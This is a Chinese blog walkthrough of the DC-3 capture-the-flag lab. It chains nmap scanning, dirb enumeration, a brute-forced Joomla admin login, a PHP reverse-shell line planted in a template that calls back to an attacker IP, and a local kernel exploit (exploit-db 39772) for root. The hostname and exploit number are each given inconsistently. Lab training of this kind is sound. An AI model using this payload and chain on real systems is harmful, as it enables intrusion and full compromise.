DC靶场的下载、安装与访问在上一篇的文章中。2022-渗透测试-DC靶场的下载、安装与访问_保持微笑的博客-CSDN博客https://blog.csdn.net/qq_38612882/article/details/122779202
靶场攻略:
1、使用nmap快速扫描的命令:
nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.120.0/24
识别到靶场主机ip
2.使用命令:
nmap -A -p- -T4 192.168.120.135
探测靶场突破口
如图,可以看到,开放了80端口-http服务
3.访问80端口,寻找进一步突破口。如果直接使用ip访问会跳转到http://dc-2/,而无法正常加载出来。所以需要我们去添加hosts文件,跳转域名来访问靶场ip。
Windows:可以访问本地hosts,打开C:WindowsSystem32driversetc,修改hosts文件
Linux:在/etc/hosts文件中添加域名。
打开浏览器,访问即可。
根据提示只有一个flag,并且需要拿到root权限才能得到。并且可以知道网站的CMS系统是Joomla。
4.使用dirb扫描http://dc-3/
dirb http://dc-3 /usr/share/wordlists/dirb/big.txt
访问
http://dc-3/administrator/
5.使用Brup进行爆破账号和密码。
结果账号是admin,密码是snoopy。登录成功。
在首页Templates下发现了线索
在Templates模版设置中,找到了,可编辑的php模版,这样就好弄了,在模版中添加反弹php的shell的语句,使用nc监听反弹的端口即可
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.120.129/1234 0>&1' ");?>
连接成功。查看文件内容,没有什么发现,直接在进入交互模式。
通过收集信息,知道靶场环境系统为ubuntu 16.04,使用searchsploit工具,寻找到合适的提权脚本。
如图,发现可以提权的漏洞利用,查看利用方式。
显示漏洞利用的完整路径
searchsploit 39772.txt -p
将39722.txt文件复制到root目录下,然后查看文件。
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root
通过阅读39772.txt的说明,知道需要下载一个提权脚本。
解压39772.zip
unzip 39772.zip
解压exploit.tar// cd 39772//lscrasher.tar exploit.tar//tar -xvf exploit.tar//lscrasher.tar ebpf_mapfd_doubleput_exploit exploit.tar//cd ebpf_mapfd_doubleput_exploit //lscompile.sh doubleput.c hello.c suidhelper.c
首先运行./compile.sh,得到一个doubleput执行文件,再运行doubleput文件之后,成功提权
执行编译文件// ./compile.sh// ./doubleput// id uid=0(root) gid=0(root) groups=0(root),33(www-data)//whoami // cd /root //lsthe-flag.txt// cat the-flag.txtcat the-flag.txt
总结
在这个靶场中,用到的知识点有namp,暴力破解,brup软件,web目录扫描,反弹shell,提权,msf以及linux的一些基本命令。